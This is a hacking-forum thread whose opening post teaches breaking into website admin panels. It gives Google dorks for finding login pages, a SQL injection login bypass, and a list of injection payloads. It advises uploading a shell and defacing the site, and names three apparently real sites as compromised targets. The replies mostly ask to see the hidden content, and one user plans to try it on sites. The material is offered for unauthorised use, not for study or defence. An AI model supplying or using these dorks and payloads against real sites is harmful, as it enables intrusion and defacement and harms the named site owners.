Basic SQL To Bypass Admin Panel
#1
You might have seen hackers hacking and defacing websites, editing them with their own stuff, making posts on websites, etc. There are many methods of doing this. In this tutorial I will be showing you a very basic and simple SQLi (Structured Query Language Injection). I will show you how to find the website's admin panel using a simple Google dork and a SQL query to bypass the admin user name and password and enter into the panel. When you are in the panel just find an upload option and upload your shell, then deface it.

[hide]
Dorks: inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp
inurl:login.aspx
inurl:login.php
inurl:admin/index.php
inurl:adminlogin.aspx



# Try to make your own dorks also to get more success rate.


Hundreds of sites will open up having /adminlogin.aspx in their URL. Select any website, and you will get the area from where the admins log in. Fill in the details as:
User: 1'or'1'='1
Password: 1'or'1'='1


Use the above mentioned login details and you will be into the admin panel of a website. It will not work for all the websites you will find, but will work on most of the websites.


Some websites which I got:

http://gimtech.in/Webadmin/AdminLogin.aspx
http://welkinindiagroup.com/admin/adminlogin.aspx
http://nobinsolutions.com/Adminlogin.aspx





Other InjecTion Queries:
Code:
‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”)
[/hide]
-Lies

Murder. #RIP Unsolidarity

Donations: 1Ebwae9KypteHuaZUe8rW9DpzAPY9rBKFV
Reply
#2
Simple, but effective. Some things are so obvious programmers seem to overlook them, and that's how sites got hacked. I remember one of my old scripts I made was a simple chatroom which used an authorization script from a phpBB forum, and when the admin removed the script, a logic flaw allowed you to log in as any username. He trolled my chatroom, and I ended up being friends with him. He referred the very first members that joined Cyber Forums.
Reply
#3
Posting to see this, I'd like to learn more about SQL. I'm going to check a few sites :D
Reply
#4
I'd like to take a look. Thanks!
Reply
#5
Oh really?? Let's see
Reply
#6
I'd like to know more about this...
Reply
#7
I'd like to take a look at this!
Reply
#8
I want to see, please
Reply
#9
Thanks man. I hope it works!!! :)
Reply
#10
Let's take a look, thanks for this ;)
Reply

